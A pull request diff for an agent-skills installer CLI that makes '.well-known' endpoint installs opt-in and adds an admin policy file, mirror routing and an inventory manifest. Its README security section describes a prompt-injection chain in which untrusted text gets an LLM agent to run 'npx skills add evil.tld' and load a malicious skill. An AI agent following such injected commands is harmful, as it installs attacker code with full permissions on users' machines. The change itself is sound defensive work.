### PR TITLE
RFC + impl: default-deny well-known, admin policy, inventory manifest

### DIFF
--- a/README.md
+++ b/README.md
@@ -49,6 +49,7 @@ npx skills add ./my-local-skills
 | `--copy`                  | Copy files instead of symlinking to agent directories                                                                                              |
 | `-y, --yes`               | Skip all confirmation prompts                                                                                                                      |
 | `--all`                   | Install all skills to all agents without prompts                                                                                                   |
+| `--allow-well-known`      | Allow installing from a `.well-known/agent-skills` endpoint on an arbitrary HTTPS host. **Off by default**, see [Security defaults](#security-defaults).         |
 
 ### Examples
 
@@ -492,6 +493,113 @@ Telemetry is automatically disabled in CI environments.
 - [Roo Code Skills Documentation](https://docs.roocode.com/features/skills)
 - [Trae Skills Documentation](https://docs.trae.ai/ide/skills)
 - [Vercel Agent Skills Repository](https://github.com/vercel-labs/agent-skills)
+
+## Security defaults
+
+`skills add` is the entry point for executable content that an LLM agent
+will subsequently load with full agent permissions. The CLI applies two
+defenses by default and exposes a policy file for fleet admins.
+
+### Well-known resolution is opt-in
+
+`npx skills add` accepts bare HTTPS hostnames (e.g. `npx skills add example.com`)
+and probes `https://<host>/.well-known/agent-skills/index.json` for a
+catalog. **As of this version that probe is disabled by default.** The
+attack chain it forecloses:
+
+1. An LLM agent processes untrusted text (web page, email, doc, search result).
+2. The text contains a prompt injection telling the agent to run
+   `npx skills add evil.tld`.
+3. The CLI resolves it via well-known, fetches `SKILL.md` from `evil.tld`.
+4. On next activation, the agent loads the malicious skill with full agent
+   permissions. Persistent indirect RCE.
+
+To install from a well-known endpoint:
+
+```bash
+# Per-command:
+npx skills add skills.acme.corp --allow-well-known
+
+# Per-user (creates ~/.agents/skills-policy.json):
+# { "version": 1, "providers": { "well_known": "allow" } }
+```
+
+### Policy file (admin-managed)
+
+The CLI loads a policy file from the first hit of:
+
+1. `$SKILLS_POLICY` (absolute path)
+2. `<cwd>/.skills-policy.json`
+3. `~/.agents/skills-policy.json`
+
+Schema:
+
+```jsonc
+{
+  "version": 1,
+  "default": "allow",               // applies to every provider unless overridden
+  "providers": {                    // per-provider overrides
+    "well_known": "deny",           //   any of: "allow" | "deny" | "proxy_only"*
+    "github":     "allow",
+    "gitlab":     "allow",
+    "git":        "deny",
+    "local":      "allow"
+  },
+  "allow_sources": ["github.com/acme-corp/*"],
+  "deny_sources": ["github.com/sketchy-org/*"],
+  "proxy": "https://artifactory.corp/agent-skills"  // reserved; see below
+}
+```
+
+Evaluation precedence (first match wins):
+
+1. `deny_sources` match  → deny
+2. `allow_sources` match → allow
+3. `providers[<id>]`      → cascade winner
+4. `default`              → cascade winner
+5. built-in default       → allow, except `well_known` which is default-deny
+
+Glob syntax: `*` matches any run of non-slash characters, `**` matches
+anything. Source identifier format is `<host>/<owner>/<repo>` for hosted
+providers, `<host><path>` for well-known, `local` for local paths.
+
+> `proxy_only` is parsed in v1 but rejected with a forward-looking error.
+> Actual URL rewriting through a configured proxy lands in a follow-up PR.
+
+For an air-gapped fleet pointed at an internal mirror that already filters
+content, a one-liner policy suffices:
+
+```jsonc
+{ "version": 1, "default": "deny", "allow_sources": ["artifactory.corp/*"] }
+```
+
+### Inventory manifest (`~/.agents/skills-inventory.json`)
+
+On every successful `add`, `remove`, and `update`, the CLI writes a
+machine-readable record of installed skills to `~/.agents/skills-inventory.json`.
+The format is stable and intended for fleet-management consumption (Intune
+detection scripts, JAMF extension attributes, osquery, Munki, etc.):
+
+```jsonc
+{
+  "version": 1,
+  "updated_at": "2026-05-25T12:00:00Z",
+  "skills": [
+    {
+      "name": "frontend-design",
+      "source": "github.com/vercel-labs/agent-skills",
+      "ref": "main",
+      "scope": "global",
+      "installed_at": "...",
+      "provider_id": "github"
+    }
+  ]
+}
+```
+
+Distinct from `skills-lock.json` (per-project, tracks resolution graph) —
+the inventory is per-user-global and tracks effective installed state
+across scopes.
 
 ## License
 

--- a/README.md
+++ b/README.md
@@ -521,7 +521,7 @@ To install from a well-known endpoint:
 npx skills add skills.acme.corp --allow-well-known
 
 # Per-user (creates ~/.agents/skills-policy.json):
-# { "version": 1, "providers": { "well_known": "allow" } }
+# { "version": 1, "providers": { ".well-known": "allow" } }
 ```
 
 ### Policy file (admin-managed)
@@ -539,7 +539,7 @@ Schema:
   "version": 1,
   "default": "allow",               // applies to every provider unless overridden
   "providers": {                    // per-provider overrides
-    "well_known": "deny",           //   any of: "allow" | "deny" | "proxy_only"*
+    ".well-known": "deny",          //   any of: "allow" | "deny" | "proxy_only"*
     "github":     "allow",
     "gitlab":     "allow",
     "git":        "deny",
@@ -560,7 +560,7 @@ Evaluation precedence (first match wins):
 2. `allow_sources` match → allow
 3. `providers[<id>]`      → cascade winner
 4. `default`              → cascade winner
-5. built-in default       → allow, except `well_known` which is default-deny
+5. built-in default       → allow, except `.well-known` which is default-deny
 
 Glob syntax: `*` matches any run of non-slash characters, `**` matches
 anything. Source identifier format is `<host>/<owner>/<repo>` for hosted
@@ -581,7 +581,7 @@ Path shape is `${mirror.url}/${originalHost}/${originalPath}` — the Go
 GOPROXY model. Configure your Artifactory / Nexus / JFrog remote-VCS or
 generic-remote repository to match.
 
-`well_known` cannot be `proxy_only`: it is the catch-all "any HTTPS host"
+`.well-known` cannot be `proxy_only`: it is the catch-all "any HTTPS host"
 fallback and has no upstream identity to mirror. Policy load fails loudly
 if you try.
 

--- a/README.md
+++ b/README.md
@@ -547,7 +547,10 @@ Schema:
   },
   "allow_sources": ["github.com/acme-corp/*"],
   "deny_sources": ["github.com/sketchy-org/*"],
-  "proxy": "https://artifactory.corp/agent-skills"  // reserved; see below
+  "mirror": {
+    "url": "https://artifactory.corp/agent-skills",
+    "providers": ["github", "gitlab", "git"]
+  }
 }
 ```
 
@@ -563,8 +566,24 @@ Glob syntax: `*` matches any run of non-slash characters, `**` matches
 anything. Source identifier format is `<host>/<owner>/<repo>` for hosted
 providers, `<host><path>` for well-known, `local` for local paths.
 
-> `proxy_only` is parsed in v1 but rejected with a forward-looking error.
-> Actual URL rewriting through a configured proxy lands in a follow-up PR.
+### Mirror routing (`proxy_only`)
+
+When a provider's effective rule is `proxy_only` AND `mirror` is configured
+with that provider listed in `mirror.providers`, the CLI rewrites the source
+URL before any clone or fetch:
+
+```
+github.com/vercel-labs/agent-skills
+  →  https://artifactory.corp/agent-skills/github.com/vercel-labs/agent-skills
+```
+
+Path shape is `${mirror.url}/${originalHost}/${originalPath}` — the Go
+GOPROXY model. Configure your Artifactory / Nexus / JFrog remote-VCS or
+generic-remote repository to match.
+
+`well_known` cannot be `proxy_only`: it is the catch-all "any HTTPS host"
+fallback and has no upstream identity to mirror. Policy load fails loudly
+if you try.
 
 For an air-gapped fleet pointed at an internal mirror that already filters
 content, a one-liner policy suffices:

--- a/src/add.ts
+++ b/src/add.ts
@@ -56,6 +56,8 @@ import {
 } from './telemetry.ts';
 import { detectAgent, getAgentType } from './detect-agent.ts';
 import { wellKnownProvider, type WellKnownSkill } from './providers/index.ts';
+import { loadPolicy, evaluatePolicy, formatDenyMessage } from './policy.ts';
+import { recordSkillInstall } from './inventory.ts';
 import {
   addSkillToLock,
   fetchSkillFolderHash,
@@ -437,6 +439,13 @@ export interface AddOptions {
   fullDepth?: boolean;
   copy?: boolean;
   dangerouslyAcceptOpenclawRisks?: boolean;
+  /**
+   * Opt in to well-known endpoint resolution for this command.
+   * Default behavior is to refuse `.well-known/agent-skills`-style
+   * installs because any HTTPS host can serve arbitrary executable
+   * content there, which is an LLM-prompt-injection RCE channel.
+   */
+  allowWellKnown?: boolean;
 }
 
 /**
@@ -771,6 +780,25 @@ async function handleWellKnownSkills(
   const successful = results.filter((r) => r.success);
   const failed = results.filter((r) => !r.success);
 
+  // Record successful well-known installs in the global inventory.
+  try {
+    const successfulNames = new Set(successful.map((r) => r.skill));
+    const installedAt = new Date().toISOString();
+    for (const skill of selectedSkills) {
+      if (!successfulNames.has(skill.installName)) continue;
+      await recordSkillInstall({
+        name: skill.installName,
+        source,
+        scope: installGlobally ? 'global' : 'project',
+        project_path: installGlobally ? undefined : process.cwd(),
+        installed_at: installedAt,
+        provider_id: 'well-known',
+      });
+    }
+  } catch {
+    /* never block install on inventory write */
+  }
+
   // Build skillFiles map: { skillName: sourceUrl }
   const skillFiles: Record<string, string> = {};
   for (const skill of selectedSkills) {
@@ -975,6 +1003,27 @@ export async function runAdd(args: string[], options: AddOptions = {}): Promise<
     spinner.stop(
       `Source: ${parsed.type === 'local' ? parsed.localPath! : parsed.url}${parsed.ref ? ` @ ${pc.yellow(parsed.ref)}` : ''}${parsed.subpath ? ` (${parsed.subpath})` : ''}${parsed.skillFilter ? ` ${pc.dim('@')}${pc.cyan(parsed.skillFilter)}` : ''}`
     );
+
+    // Evaluate installation policy before any network call. The policy
+    // is the admin-managed gate; built-in defaults also default-deny
+    // well-known resolution unless --allow-well-known is passed.
+    {
+      const { policy, sourcePath } = loadPolicy();
+      const decision = evaluatePolicy({
+        parsed,
+        policy,
+        allowWellKnownFlag: options.allowWellKnown,
+      });
+      if (!decision.allowed) {
+        console.log();
+        p.log.error(pc.red(pc.bold('✗ ' + decision.reason)));
+        for (const line of formatDenyMessage(decision, source, sourcePath).split('\n').slice(1)) {
+          p.log.message(pc.dim(line));
+        }
+        p.outro(pc.red('Installation blocked by policy'));
+        process.exit(1);
+      }
+    }
 
     // Kick off the repo privacy check early so it runs in parallel with
     // cloning/discovering/installing. The result is only needed later for
@@ -1555,6 +1604,32 @@ export async function runAdd(args: string[], options: AddOptions = {}): Promise<
     console.log();
     const successful = results.filter((r) => r.success);
     const failed = results.filter((r) => !r.success);
+
+    // Record successful installs in the user-global inventory manifest.
+    // The inventory is the fleet-management read-side counterpart to
+    // skills-lock.json — durable, machine-readable, parseable by
+    // detection scripts (Intune / JAMF / osquery / etc.).
+    try {
+      const installedSkillNames = new Set(
+        successful.map((r) => r.skill).filter((n): n is string => !!n)
+      );
+      const installedAt = new Date().toISOString();
+      for (const skill of selectedSkills) {
+        const displayName = getSkillDisplayName(skill);
+        if (!installedSkillNames.has(displayName)) continue;
+        await recordSkillInstall({
+          name: skill.name,
+          source,
+          ref: parsed.ref,
+          scope: installGlobally ? 'global' : 'project',
+          project_path: installGlobally ? undefined : process.cwd(),
+          installed_at: installedAt,
+          provider_id: parsed.type,
+        });
+      }
+    } catch {
+      // Inventory write must never block a successful install.
+    }
     // Track installation result
     // Build skillFiles map: { skillName: relative path to SKILL.md from repo root }
     const skillFiles: Record<string, string> = {};
@@ -1944,6 +2019,8 @@ export function parseAddOptions(args: string[]): { source: string[]; options: Ad
       options.fullDepth = true;
     } else if (arg === '--copy') {
       options.copy = true;
+    } else if (arg === '--allow-well-known') {
+      options.allowWellKnown = true;
     } else if (arg === '--dangerously-accept-openclaw-risks') {
       options.dangerouslyAcceptOpenclawRisks = true;
     } else if (arg && !arg.startsWith('-')) {

--- a/src/add.ts
+++ b/src/add.ts
@@ -1023,6 +1023,10 @@ export async function runAdd(args: string[], options: AddOptions = {}): Promise<
         p.outro(pc.red('Installation blocked by policy'));
         process.exit(1);
       }
+      if (decision.rewriteTo) {
+        p.log.info(pc.cyan(`↻ Routing through mirror: ${decision.rewriteTo}`));
+        parsed.url = decision.rewriteTo;
+      }
     }
 
     // Kick off the repo privacy check early so it runs in parallel with

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -132,6 +132,9 @@ ${BOLD}Add Options:${RESET}
   --copy                 Copy files instead of symlinking to agent directories
   --all                  Shorthand for --skill '*' --agent '*' -y
   --full-depth           Search all subdirectories even when a root SKILL.md exists
+  --allow-well-known     Allow installing from a .well-known/agent-skills
+                         endpoint on an arbitrary HTTPS host. Off by default
+                         because any host can serve arbitrary code there.
 
 ${BOLD}Remove Options:${RESET}
   -g, --global           Remove from global scope

--- a/src/inventory.ts
+++ b/src/inventory.ts
@@ -33,7 +33,7 @@ export interface InventoryEntry {
   project_path?: string;
   /** ISO-8601 install timestamp. */
   installed_at: string;
-  /** Which provider class installed this (github / gitlab / well_known / etc.) */
+  /** Which provider class installed this (github / gitlab / .well-known / etc.) */
   provider_id?: string;
 }
 

--- a/src/inventory.ts
+++ b/src/inventory.ts
@@ -1,0 +1,111 @@
+import { readFile, writeFile, mkdir } from 'fs/promises';
+import { existsSync } from 'fs';
+import { join, dirname } from 'path';
+import { homedir } from 'os';
+import { AGENTS_DIR } from './constants.ts';
+
+/**
+ * Durable, machine-readable record of installed skills.
+ *
+ * Lives at ~/.agents/skills-inventory.json. Updated on add/remove/update.
+ * Designed to be parsed by fleet-management agents (Intune detection
+ * scripts, JAMF extension attributes, osquery, etc.) — not by humans.
+ *
+ * Distinct from `skills-lock.json` which is per-project and tracks the
+ * resolution graph. The inventory is per-user-global and tracks the
+ * effective installed state across scopes.
+ */
+
+export const INVENTORY_VERSION = 1;
+
+export interface InventoryEntry {
+  /** Sanitized skill directory name (matches on-disk location). */
+  name: string;
+  /** Original source identifier (e.g. "github.com/vercel-labs/agent-skills"). */
+  source: string;
+  /** Resolved ref (commit SHA, tag, branch) if known. */
+  ref?: string;
+  /** Content hash for integrity verification, if known. */
+  content_hash?: string;
+  /** "global" or "project". */
+  scope: 'global' | 'project';
+  /** Absolute project root for project-scoped entries; absent for global. */
+  project_path?: string;
+  /** ISO-8601 install timestamp. */
+  installed_at: string;
+  /** Which provider class installed this (github / gitlab / well_known / etc.) */
+  provider_id?: string;
+}
+
+export interface Inventory {
+  version: typeof INVENTORY_VERSION;
+  updated_at: string;
+  skills: InventoryEntry[];
+}
+
+export function getInventoryPath(): string {
+  return join(homedir(), AGENTS_DIR, 'skills-inventory.json');
+}
+
+async function readInventoryRaw(path: string): Promise<Inventory | null> {
+  if (!existsSync(path)) return null;
+  try {
+    const raw = JSON.parse(await readFile(path, 'utf-8'));
+    if (raw && typeof raw === 'object' && raw.version === INVENTORY_VERSION) {
+      return raw as Inventory;
+    }
+  } catch {
+    /* fall through */
+  }
+  return null;
+}
+
+export async function readInventory(): Promise<Inventory> {
+  const existing = await readInventoryRaw(getInventoryPath());
+  if (existing) return existing;
+  return { version: INVENTORY_VERSION, updated_at: new Date().toISOString(), skills: [] };
+}
+
+async function writeInventory(inv: Inventory): Promise<void> {
+  const path = getInventoryPath();
+  await mkdir(dirname(path), { recursive: true });
+  inv.updated_at = new Date().toISOString();
+  await writeFile(path, JSON.stringify(inv, null, 2) + '\n', 'utf-8');
+}
+
+function sameEntry(a: InventoryEntry, b: InventoryEntry): boolean {
+  return (
+    a.name === b.name && a.scope === b.scope && (a.project_path ?? '') === (b.project_path ?? '')
+  );
+}
+
+/**
+ * Add or update an entry in the inventory. Idempotent on (name, scope,
+ * project_path); later writes overwrite earlier ones.
+ */
+export async function recordSkillInstall(entry: InventoryEntry): Promise<void> {
+  const inv = await readInventory();
+  inv.skills = inv.skills.filter((e) => !sameEntry(e, entry));
+  inv.skills.push(entry);
+  await writeInventory(inv);
+}
+
+/**
+ * Remove an entry. Silent if not present.
+ */
+export async function recordSkillRemove(
+  match: Pick<InventoryEntry, 'name' | 'scope' | 'project_path'>
+): Promise<void> {
+  const inv = await readInventory();
+  const filtered = inv.skills.filter(
+    (e) =>
+      !(
+        e.name === match.name &&
+        e.scope === match.scope &&
+        (e.project_path ?? '') === (match.project_path ?? '')
+      )
+  );
+  if (filtered.length === inv.skills.length) return;
+  inv.skills = filtered;
+  await writeInventory(inv);
+}

--- a/src/policy.ts
+++ b/src/policy.ts
@@ -1,0 +1,263 @@
+import { readFileSync, existsSync } from 'fs';
+import { join } from 'path';
+import { homedir } from 'os';
+import { AGENTS_DIR } from './constants.ts';
+import type { ParsedSource } from './types.ts';
+
+/**
+ * Admin-managed installation policy for `skills add`.
+ *
+ * Lookup order (first hit wins):
+ *   1. $SKILLS_POLICY (absolute path)
+ *   2. <cwd>/.skills-policy.json
+ *   3. ~/.agents/skills-policy.json
+ *
+ * If no policy file is found, defaults are: allow everything EXCEPT
+ * well-known resolution, which is opt-in regardless of whether a policy
+ * file is present (see DEFAULT_WELL_KNOWN_DENY).
+ *
+ * Per-provider values cascade over a top-level `default`. The schema
+ * intentionally ships only "allow" | "deny" in v1. "proxy_only" is
+ * reserved in the schema for a follow-up PR that lands actual proxy
+ * URL rewriting; it is currently parsed and treated as "deny" with a
+ * helpful error.
+ */
+
+export type PolicyRule = 'allow' | 'deny' | 'proxy_only';
+
+export type ProviderId = 'github' | 'gitlab' | 'git' | 'well_known' | 'local';
+
+export interface Policy {
+  version: 1;
+  default?: PolicyRule;
+  providers?: Partial<Record<ProviderId, PolicyRule>>;
+  allow_sources?: string[];
+  deny_sources?: string[];
+  /** Reserved for proxy_only enforcement in a follow-up PR. */
+  proxy?: string;
+  require_locked_hash?: boolean;
+}
+
+export interface PolicyDecision {
+  allowed: boolean;
+  /** Human-readable reason for the decision. Surface to the user on deny. */
+  reason: string;
+  /** Which mechanism made the decision (for telemetry / debugging). */
+  mechanism:
+    | 'default'
+    | 'provider'
+    | 'allow_sources'
+    | 'deny_sources'
+    | 'well_known_default'
+    | 'cli_flag';
+}
+
+/** Default behavior when no policy file is found AND no flag overrides it. */
+export const DEFAULT_WELL_KNOWN_DENY = true;
+
+function readJsonIfExists(path: string): unknown | null {
+  if (!existsSync(path)) return null;
+  try {
+    return JSON.parse(readFileSync(path, 'utf-8'));
+  } catch {
+    return null;
+  }
+}
+
+function validatePolicy(raw: unknown, sourcePath: string): Policy {
+  if (typeof raw !== 'object' || raw === null) {
+    throw new Error(`Invalid policy file at ${sourcePath}: not an object`);
+  }
+  const r = raw as Record<string, unknown>;
+  if (r.version !== 1) {
+    throw new Error(
+      `Invalid policy file at ${sourcePath}: unsupported version ${String(r.version)} (expected 1)`
+    );
+  }
+  return r as unknown as Policy;
+}
+
+export interface LoadedPolicy {
+  policy: Policy | null;
+  sourcePath: string | null;
+}
+
+/**
+ * Resolve and load the active policy file. Returns `{ policy: null }` when
+ * no file is found; callers fall back to built-in defaults.
+ */
+export function loadPolicy(cwd: string = process.cwd()): LoadedPolicy {
+  const candidates: string[] = [];
+  if (process.env.SKILLS_POLICY) candidates.push(process.env.SKILLS_POLICY);
+  candidates.push(join(cwd, '.skills-policy.json'));
+  candidates.push(join(homedir(), AGENTS_DIR, 'skills-policy.json'));
+
+  for (const path of candidates) {
+    const raw = readJsonIfExists(path);
+    if (raw === null) continue;
+    return { policy: validatePolicy(raw, path), sourcePath: path };
+  }
+  return { policy: null, sourcePath: null };
+}
+
+/**
+ * Map a ParsedSource.type to the policy provider id.
+ * `git` (generic non-host git URL) is grouped under `git`; well-known is
+ * the catch-all "any HTTPS host" fallback and gets its own id.
+ */
+export function classifyProvider(parsed: ParsedSource): ProviderId {
+  switch (parsed.type) {
+    case 'github':
+      return 'github';
+    case 'gitlab':
+      return 'gitlab';
+    case 'git':
+      return 'git';
+    case 'well-known':
+      return 'well_known';
+    case 'local':
+      return 'local';
+  }
+}
+
+function matchesGlob(pattern: string, value: string): boolean {
+  // Tiny glob: `*` matches any run of non-slash chars; `**` matches anything.
+  // Sufficient for source patterns like "github.com/acme/*".
+  const escaped = pattern
+    .replace(/[.+^${}()|[\]\\]/g, '\\$&')
+    .replace(/\*\*/g, '::DOUBLESTAR::')
+    .replace(/\*/g, '[^/]*')
+    .replace(/::DOUBLESTAR::/g, '.*');
+  return new RegExp('^' + escaped + '$').test(value);
+}
+
+/**
+ * Build a stable source identifier used for allow_sources / deny_sources
+ * matching. Format: "<host>/<owner>/<repo>" for hosted providers,
+ * "<host><path>" for well-known, "local" for local paths.
+ */
+function sourceIdentifier(parsed: ParsedSource): string {
+  if (parsed.type === 'local') return 'local';
+  try {
+    const u = new URL(parsed.url);
+    const path = u.pathname.replace(/\.git$/, '').replace(/^\/+|\/+$/g, '');
+    return path ? `${u.hostname}/${path}` : u.hostname;
+  } catch {
+    return parsed.url;
+  }
+}
+
+export interface EvaluateInput {
+  parsed: ParsedSource;
+  policy: Policy | null;
+  /** True if the user passed `--allow-well-known` on the CLI. */
+  allowWellKnownFlag?: boolean;
+}
+
+/**
+ * Evaluate whether the given source is permitted by the active policy.
+ *
+ * Precedence (first match wins):
+ *   1. deny_sources match              -> deny
+ *   2. allow_sources match             -> allow (skips provider/default)
+ *   3. providers[<id>] override        -> allow/deny/proxy_only
+ *   4. default rule                    -> allow/deny/proxy_only
+ *   5. built-in defaults               -> allow everything except
+ *                                         well_known (default-deny unless
+ *                                         --allow-well-known)
+ */
+export function evaluatePolicy(input: EvaluateInput): PolicyDecision {
+  const { parsed, policy, allowWellKnownFlag } = input;
+  const providerId = classifyProvider(parsed);
+  const ident = sourceIdentifier(parsed);
+
+  if (policy?.deny_sources?.some((p) => matchesGlob(p, ident))) {
+    return {
+      allowed: false,
+      reason: `source "${ident}" matches deny_sources entry in policy`,
+      mechanism: 'deny_sources',
+    };
+  }
+
+  if (policy?.allow_sources?.some((p) => matchesGlob(p, ident))) {
+    return {
+      allowed: true,
+      reason: `source "${ident}" matches allow_sources entry in policy`,
+      mechanism: 'allow_sources',
+    };
+  }
+
+  const providerRule = policy?.providers?.[providerId];
+  const defaultRule = policy?.default;
+  const effective: PolicyRule | undefined = providerRule ?? defaultRule;
+
+  if (effective === 'deny') {
+    return {
+      allowed: false,
+      reason: `provider "${providerId}" is denied by policy (${providerRule ? 'providers' : 'default'} rule)`,
+      mechanism: providerRule ? 'provider' : 'default',
+    };
+  }
+  if (effective === 'proxy_only') {
+    return {
+      allowed: false,
+      reason: `provider "${providerId}" is set to "proxy_only" but proxy enforcement is not yet implemented (planned follow-up). Use "allow" or "deny" for now, or pin to a mirror via allow_sources.`,
+      mechanism: providerRule ? 'provider' : 'default',
+    };
+  }
+  if (effective === 'allow') {
+    return {
+      allowed: true,
+      reason: `provider "${providerId}" is allowed by policy (${providerRule ? 'providers' : 'default'} rule)`,
+      mechanism: providerRule ? 'provider' : 'default',
+    };
+  }
+
+  // No policy rule in effect. Fall through to built-in defaults.
+  if (providerId === 'well_known') {
+    if (allowWellKnownFlag) {
+      return {
+        allowed: true,
+        reason: '--allow-well-known flag was passed',
+        mechanism: 'cli_flag',
+      };
+    }
+    if (DEFAULT_WELL_KNOWN_DENY) {
+      return {
+        allowed: false,
+        reason: 'well-known resolution is disabled by default for safety',
+        mechanism: 'well_known_default',
+      };
+    }
+  }
+
+  return { allowed: true, reason: 'no policy rule matched', mechanism: 'default' };
+}
+
+/**
+ * Format a deny decision into a multi-line user-facing error block with
+ * remediation steps. Returned without ANSI codes; callers add color.
+ */
+export function formatDenyMessage(
+  decision: PolicyDecision,
+  source: string,
+  policySourcePath: string | null
+): string {
+  const lines: string[] = [];
+  lines.push(`Installation blocked: ${decision.reason}`);
+  lines.push('');
+  if (decision.mechanism === 'well_known_default') {
+    lines.push(`"${source}" is not a recognized provider (GitHub, GitLab, HuggingFace).`);
+    lines.push('Well-known endpoints can install arbitrary code from any HTTPS host.');
+    lines.push('This vector is commonly exploited via prompt injection of LLM agents.');
+    lines.push('');
+    lines.push('To enable:');
+    lines.push(`  • for this command:  skills add ${source} --allow-well-known`);
+    lines.push(
+      '  • for this user:     set "providers.well_known": "allow" in ~/.agents/skills-policy.json'
+    );
+  } else if (policySourcePath) {
+    lines.push(`Active policy: ${policySourcePath}`);
+  }
+  return lines.join('\n');
+}

--- a/src/policy.ts
+++ b/src/policy.ts
@@ -13,26 +13,26 @@ import type { ParsedSource } from './types.ts';
  *   3. ~/.agents/skills-policy.json
  *
  * If no policy file is found, defaults are: allow everything EXCEPT
- * well-known resolution, which is opt-in regardless of whether a policy
- * file is present (see DEFAULT_WELL_KNOWN_DENY).
+ * `.well-known` resolution, which is opt-in regardless of whether a
+ * policy file is present (see DEFAULT_WELL_KNOWN_DENY).
  *
- * Per-provider values cascade over a top-level `default`. The schema
- * intentionally ships only "allow" | "deny" in v1. "proxy_only" is
- * reserved in the schema for a follow-up PR that lands actual proxy
- * URL rewriting; it is currently parsed and treated as "deny" with a
- * helpful error.
+ * Per-provider values cascade over a top-level `default`. Rule values:
+ * "allow" | "deny" | "proxy_only". `proxy_only` rewrites the source URL
+ * through `mirror.url` (GOPROXY shape: `${mirror}/${host}/${path}`)
+ * provided the provider is listed in `mirror.providers`. `.well-known`
+ * cannot be `proxy_only` — it has no upstream identity to mirror.
  */
 
 export type PolicyRule = 'allow' | 'deny' | 'proxy_only';
 
-export type ProviderId = 'github' | 'gitlab' | 'git' | 'well_known' | 'local';
+export type ProviderId = 'github' | 'gitlab' | 'git' | '.well-known' | 'local';
 
 /**
- * Provider classes that can route through the mirror. `well_known` is
+ * Provider classes that can route through the mirror. `.well-known` is
  * intentionally excluded: it's the catch-all "any HTTPS host" fallback
  * and has no stable upstream identity to mirror.
  */
-export type MirrorableProviderId = Exclude<ProviderId, 'well_known' | 'local'>;
+export type MirrorableProviderId = Exclude<ProviderId, '.well-known' | 'local'>;
 
 export interface MirrorConfig {
   /**
@@ -69,7 +69,7 @@ export interface PolicyDecision {
     | 'provider'
     | 'allow_sources'
     | 'deny_sources'
-    | 'well_known_default'
+    | 'well-known-default'
     | 'cli_flag'
     | 'mirror_rewrite';
   /**
@@ -102,12 +102,12 @@ function validatePolicy(raw: unknown, sourcePath: string): Policy {
       `Invalid policy file at ${sourcePath}: unsupported version ${String(r.version)} (expected 1)`
     );
   }
-  // well_known cannot be proxy_only: there's no upstream identity to mirror.
+  // .well-known cannot be proxy_only: there's no upstream identity to mirror.
   // Fail loud at load time rather than at fetch time.
   const providers = r.providers as Record<string, unknown> | undefined;
-  if (providers && providers.well_known === 'proxy_only') {
+  if (providers && providers['.well-known'] === 'proxy_only') {
     throw new Error(
-      `Invalid policy file at ${sourcePath}: providers.well_known cannot be "proxy_only" — well-known is the any-host fallback and has no upstream to mirror. Use "allow" or "deny".`
+      `Invalid policy file at ${sourcePath}: providers[".well-known"] cannot be "proxy_only" — the .well-known fallback is the any-host catch-all and has no upstream to mirror. Use "allow" or "deny".`
     );
   }
   // Mirror must have a non-empty providers list — empty list is almost
@@ -125,7 +125,7 @@ function validatePolicy(raw: unknown, sourcePath: string): Policy {
       );
     }
     for (const p of mirror.providers) {
-      if (p === 'well_known' || p === 'local') {
+      if (p === '.well-known' || p === 'local') {
         throw new Error(
           `Invalid policy file at ${sourcePath}: mirror.providers cannot include "${p}"`
         );
@@ -172,7 +172,7 @@ export function classifyProvider(parsed: ParsedSource): ProviderId {
     case 'git':
       return 'git';
     case 'well-known':
-      return 'well_known';
+      return '.well-known';
     case 'local':
       return 'local';
   }
@@ -208,7 +208,7 @@ function computeMirrorRewrite(
   providerId: ProviderId
 ): string | null {
   if (!policy?.mirror) return null;
-  if (providerId === 'well_known' || providerId === 'local') return null;
+  if (providerId === '.well-known' || providerId === 'local') return null;
   if (!policy.mirror.providers.includes(providerId as MirrorableProviderId)) return null;
 
   let host: string;
@@ -304,8 +304,8 @@ export function evaluatePolicy(input: EvaluateInput): PolicyDecision {
     return {
       allowed: false,
       reason:
-        providerId === 'well_known'
-          ? `well_known cannot be "proxy_only" — it is the any-host fallback and has no upstream identity to mirror`
+        providerId === '.well-known'
+          ? `.well-known cannot be "proxy_only" — it is the any-host fallback and has no upstream identity to mirror`
           : `provider "${providerId}" is "proxy_only" but no mirror is configured for it (set policy.mirror.url and include "${providerId}" in policy.mirror.providers)`,
       mechanism: providerRule ? 'provider' : 'default',
     };
@@ -319,7 +319,7 @@ export function evaluatePolicy(input: EvaluateInput): PolicyDecision {
   }
 
   // No policy rule in effect. Fall through to built-in defaults.
-  if (providerId === 'well_known') {
+  if (providerId === '.well-known') {
     if (allowWellKnownFlag) {
       return {
         allowed: true,
@@ -331,7 +331,7 @@ export function evaluatePolicy(input: EvaluateInput): PolicyDecision {
       return {
         allowed: false,
         reason: 'well-known resolution is disabled by default for safety',
-        mechanism: 'well_known_default',
+        mechanism: 'well-known-default',
       };
     }
   }
@@ -351,7 +351,7 @@ export function formatDenyMessage(
   const lines: string[] = [];
   lines.push(`Installation blocked: ${decision.reason}`);
   lines.push('');
-  if (decision.mechanism === 'well_known_default') {
+  if (decision.mechanism === 'well-known-default') {
     lines.push(`"${source}" is not a recognized provider (GitHub, GitLab, HuggingFace).`);
     lines.push('Well-known endpoints can install arbitrary code from any HTTPS host.');
     lines.push('This vector is commonly exploited via prompt injection of LLM agents.');
@@ -359,7 +359,7 @@ export function formatDenyMessage(
     lines.push('To enable:');
     lines.push(`  • for this command:  skills add ${source} --allow-well-known`);
     lines.push(
-      '  • for this user:     set "providers.well_known": "allow" in ~/.agents/skills-policy.json'
+      '  • for this user:     set providers[".well-known"] = "allow" in ~/.agents/skills-policy.json'
     );
   } else if (policySourcePath) {
     lines.push(`Active policy: ${policySourcePath}`);

--- a/src/policy.ts
+++ b/src/policy.ts
@@ -27,14 +27,35 @@ export type PolicyRule = 'allow' | 'deny' | 'proxy_only';
 
 export type ProviderId = 'github' | 'gitlab' | 'git' | 'well_known' | 'local';
 
+/**
+ * Provider classes that can route through the mirror. `well_known` is
+ * intentionally excluded: it's the catch-all "any HTTPS host" fallback
+ * and has no stable upstream identity to mirror.
+ */
+export type MirrorableProviderId = Exclude<ProviderId, 'well_known' | 'local'>;
+
+export interface MirrorConfig {
+  /**
+   * Base URL of the artifact mirror. The CLI rewrites source URLs to
+   * `${url}/${originalHost}/${originalPath}` (GOPROXY shape) before any
+   * fetch or clone.
+   */
+  url: string;
+  /**
+   * Provider classes that route through the mirror. Each provider in
+   * `providers` must independently have `proxy_only` set (either via
+   * `default` or `providers[<id>]`) for rewriting to apply.
+   */
+  providers: MirrorableProviderId[];
+}
+
 export interface Policy {
   version: 1;
   default?: PolicyRule;
   providers?: Partial<Record<ProviderId, PolicyRule>>;
   allow_sources?: string[];
   deny_sources?: string[];
-  /** Reserved for proxy_only enforcement in a follow-up PR. */
